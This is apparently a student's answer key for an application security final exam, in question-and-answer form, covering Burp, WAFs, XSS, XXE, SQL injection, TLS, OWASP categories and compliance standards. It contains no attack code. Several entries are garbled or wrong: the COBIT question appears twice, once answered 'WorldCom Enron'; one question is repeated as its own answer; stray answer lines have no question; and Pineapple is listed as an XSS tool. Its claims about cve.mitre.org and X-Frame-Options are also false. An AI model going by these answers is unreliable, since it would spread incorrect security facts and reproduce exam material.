Application Security Final
Extending Burp functionality is possible through the use of extensions. Which extension type is not supported in Burp?
.NET
Which attack commonly associated with phishing can a WAF protect against?
Cross Site Scripting
Select the technical safeguards associated with HIPAA 164 subpart C Administrative safeguards that is not a standard.
Encryption
Implementing whitelisting on the server for validation is one of the best ways to prevent XXE attacks.
False
Broken access control affects Auth-Z
True
By the year 2020 there will be more devices than people in use worldwide.
True
In XML, a Tag begins with < and ends with >
True
The parameterized query statement SqlCommand() is used to bind variables in which language?
.NET
Order the threat modeling process.
1. Draw your picture 2. List all elements 3. Ask specific questions
AWS Lambda is defined as the following:
A serverless, event-driven, computing platform that runs code in response to events
Identify all the components from which CloudWatch can consume log information:
AWS Lambda Amazon ECS Amazon EC2
PCI-DSS prohibits storage of the following data element:
CAV2/CVC2/CVV2/CID
The following Common Weakness Enumeration (CWE) listings provides the basis for broken access control?
CWE-284 Improper Access Control
Which control type do applications rely on to obfuscate or hide information from the end user?
Client-side Controls
Identify the 2nd step in integrated management:
Configuration management
WAF protection mechanisms includes the following: (select all that apply)
Cookie Protection Session Management Protection
The dynamic application trend includes the following components except:
Customer behavior is very predictable
Information in a database should be protected according to content. Which item is key to this process?
Data Classification
Select all the valid threat modeling question catagories:
Data Flow Data Stores Processes
Which SQL Injection impact is difficult to detect and posses the greatest integrity risk to the business?
Data modification
Which two of the the listed backend systems are potentially vulnerable to injection?
Database Web Server
Where should TLS be used? Select the most correct answer.
Everywhere
The increasing complexity trend includes the following components except:
Generalization in the persistence tier
Identify the proper order for the centralized logging example given in the presentation:
Identify the proper order for the centralized logging example given in the presentation:
In addition to implementing the principle of least privilege on the database, the following can serve as a checklist to secure the application server.
Implement ASVS controls
List 2 STRIDE attack types that are applicable to a TLS connection between and end user and web server. Reference examples in presentation.
Information Disclosure Tampering
Securing a Host includes the following areas except
Input Validation
What does TLS provide the user? Select three.
Integrity, Confidentiality, Authenticity
Logging without monitoring is:
Is an ineffective control due to the lack of processing and classification
XML document formats include all of the following except:
JSON
In a reflected XSS attack an attacker sends a link to the user (victim) that contains an XSS payload. Which delivery mechanism is commonly used to deliver the payload?
Phishing Email
Information Disclosure Tampering
Spoofing
What does TLS stand for?
Transport Layer Security
Billion Laughs Attack expands a 1 KB block of XML to roughly 3 GB of memory.
True
This type of query is resilient to SQL Injection
parameterized query
The Billion Laughs Attack is this type of attack:
Denial of Service
Bulletin Boards and Forums are common ways to inject a reflected XSS attack variant
False
Companies that perform monthly penetration tests should be confident their web applications are secure 24/7.
False
Which compliance standard involves the removal of personal data and is quite challenging to implement?
GDPR
The COBIT framework was created by which organization?
ISACA
A typical Cross Site Scripting (XSS) attack includes: (multiple answers)
Session Stealing Account Takeover
Select the implementation specification associated with HIPAA 164 subpart C Administrative safeguards that is not required.
Password management
Which of the following is not considered a typical development environment problem?
Platform Vulnerabilities
What types of questions should be asked? Choose four.
Process questions External Entity Questions Data flow questions Data Store questions
What are the current parts for the development of threat models? Choose three.
STRIDE Data Flow Diagrams Threats
What does SSL stand for?
Secure Sockets Layer
Automated tools contribute to an easy level of exploitability for the cross-site scripting (XSS) vulnerability
True
Insecure Direct Access References can disclose private data
True
Insecure Direct Object References represents a horizontal or lateral access control vulnerability
True
In order to assess current vulnerabilities, the following resources would be used except:
exploit-db.com website
The XML tag that enables DTD inclusion, required to execute a XXE attack is:
!DOCTYPE
The User-Agent request header provides the following information to the server Except:
Accepted Encoding type
Which of the following represents a true statement about the TLS Protocol
Both Symmetric and Asymmetric encryption are used
A WAF is implemented as a software appliance only
False
DTD stands for Data Type Definition
False
This type XSS attack variant does not persist.
Reflected
Which of the following data flows would represent the highest risk for the contents of the data store?
User <> firewall <> Web Server <> firewall <> database
Which of the OWASP Top 10 categories would the following fit into? Software is unsupported or out of date
Using components with known vulnerabilities
This WAF feature allows a customer to shorten the window of exposure while fully testing the remediation methods.
Virtual Patching
This scanner detects vulnerable javascript libraries as a command line tool or browser plug-in?
retire.js
Which of the following HTTP response codes indicates the issue is with the client request.
404 not found
An example of an application protection framework is the following:
AppSensor
A Web Application Firewall operates at which OSI Layer?
Application
Injected SQL queries run under the context of which account?
Application Account
________ is one of the main factors driving the need for Web Application Firewalls
Developers not incentivized to develop secure code
Which of the following represents the greatest impact to developer security habits and mindset?
Developers rarely receive formal security training in school or on the job
A user with administrative privileges should always use a single account for both user and administrative tasks to reduce the amount of accounts and account management tasks.
False
ASCII is designed to convert international writing systems into browser readable text
False
HTTPS should only be used on web pages that pass username and password information
False
Known vulnerabilities and corresponding fixes can be found at cve.mitre.org
False
More privileges can be revoked through the Dynamic SQL DB Query Method than the Stored Procedure DB Query Method
False
OWASP is a commercial company focused application security
False
Per OWASP, the attack vector exploitability rating for Insecure Deserialization is AVERAGE
False
SQL Injection is the only form of injection attack available to a hacker
False
Software security assurance is not practical in an agile development model
False
Symmetric Cryptography uses a public and private key to encrypt data.
False
The AWS WAF cannot be deployed with AWS CloudFront
False
The HttpOnly parameter for the set-cookies header tells the browser to allow the use of client side JavaScript to send the cookie
False
User IDs are case sensitive according to authentication guidelines.
False
When patching a development stack like LAMP it is not important to consider the interdependences between the operating system, database, web server, and application platform.
False
Which of the following web application components represents optional functionality in a typical end-to-end solution?
Firewall
Industry standards based on Extensible Markup Language or XML include:
HL7
Which two previous OWASP vulnerabilities were merged to create current OWASP top ten vulnerability of Broken Access Control?
Insecure Direct Object References Missing Function Level Access Control
Which of the following challenges represents the greatest security threat to the Internet?
Internet of Things
What does HTTP Strict Transport Security provide to the user?
It forces the browser to only make HTTPS connections to the server.
Why is an accurate data flow diagram important for threat modeling?
It shows the input and output to everything that can be attacked.
Select the 2 options available within AWS to provide logging and monitoring.
Lamda Cloudwatch
Which of the following is not a Cross Site Scripting Attack Payload type?
Log deletion
The following are all examples of Insufficient Logging and Monitoring.
Logs are only stored locally Auditable events, such as failed logins, are not logged Vulnerability scanning tools do not trigger alerts
The current compliance standard governing publicly traded companies is the following:
None of the above
Open source XSS attack tools include which of the following?
Pineapple
Which SSL attack signaled the death of SSL 3.0?
Poodle
AWS WAF Managed Rules are...
Preconfigured rule sets including OWASP Top 10 available for an additional cost
Which of the following is NOT an authentication guideline for email addresses?
Requires SMTP/TLS connection
PCI-DSS includes the following goals except which of the following?
Restrict physical access to cardholder data
DTD is the oldest XML schema going back to which standard?
SGML
Which intercepting proxy functionality is not available within the Burb Community edition? (Functionality is grouped by tab in the burp user interface)
Scanner
A comprehensive data classification taxonomy represents a core requirement in defending against this vulnerability.
Sensitive Data Exposure
Which of the following components is most secure based on proximity to the "trusted" core?
Servers
Which functionality within Burp produces a site map after it is run?
Spider
According to the PCI-DSS survey in the reading material, which of the following activities put cardholder data at the highest risk?
Storage of payment card numbers
Which of the following headers is required to implement HTTP Strict Transport Security?
Strict-Transport-Security
Which attack types make up STRIDE?
Tampering Information disclosure Elevation of Privilege Spoofing Denial of Service Repudiation
API security can provide access to monitoring and transformation applications through JSON, REST, and SOAP.
True
Center for Internet Security provides over 500 security benchmarks for popular operating systems.
True
Components typically run with the same privileges as the application itself
True
DOM XSS attacks are triggered when a victim interacts with a web page without causing the page to reload.
True
HTTPS provides verification of server identity via a X.509 certificate
True
Keystroke loggers can take the form of software or a hardware device
True
Known vulnerabilities and corresponding fixes can be found at nvd.nist.gov
True
One option for certificate pinning is to carry a copy of the server's public key.
True
Parameterized Queries perform data type checking on parameter values and limits scope of user input
True
Setting the X-Frame-options header is a defensive setting to prevent Cross Site Scripting
True
Shodan is a tool for scanning Internet of Things (IoT) devices worldwide.
True
String building allows untrusted data to be inserted into a database query
True
Two behaviors that can introduce access control weakness are Specification and Enforcement
True
Using an intercepting proxy to index a web application produces a site map.
True
Utilizing an intercepting proxy like Burp provides visibility to detailed web application traffic and information not visible to the end user in the browser.
True
Web Application Firewalls use signatures to identify threats similar to malware and virus detection software.
True
When remediating source code is not an immediate option a virtual patch can be deployed to protect an application.
True
XSS Attack Payload Types include Session hijacking
True
What is the best way to discover sample or default functionality of a web server?
Use Burp Intruder and a fuzzing list such as FuzzDB.
The COBIT framework was created by which organization?
WorldCom Enron
This component is required to use an intercepting proxy successfully when interacting with secure (HTTPS) web sites.
X.509 Certificate
Select a technique that is used for discovering hidden web content in addition to using spider functionality.
burp
URLs can contain parameters that are visible in the address bar such as: http://mysite.com/listing/?type=2&location=OH Name a tool that can be used to manipulate these parameters before they are sent back to the web site.
burp
When assessing a newly released vulnerability it is most important to...
determine if the vulnerability applies to components in your environment (i.e. Apache, MySQL, etc.)
These two activities are essential to assessing current applications for vulnerabilities (SELECT TWO)
scan for vulnerabilities regularly Subscribe to security bulletins
Which HTML tag is often used to inject an XSS attack? < .... >
script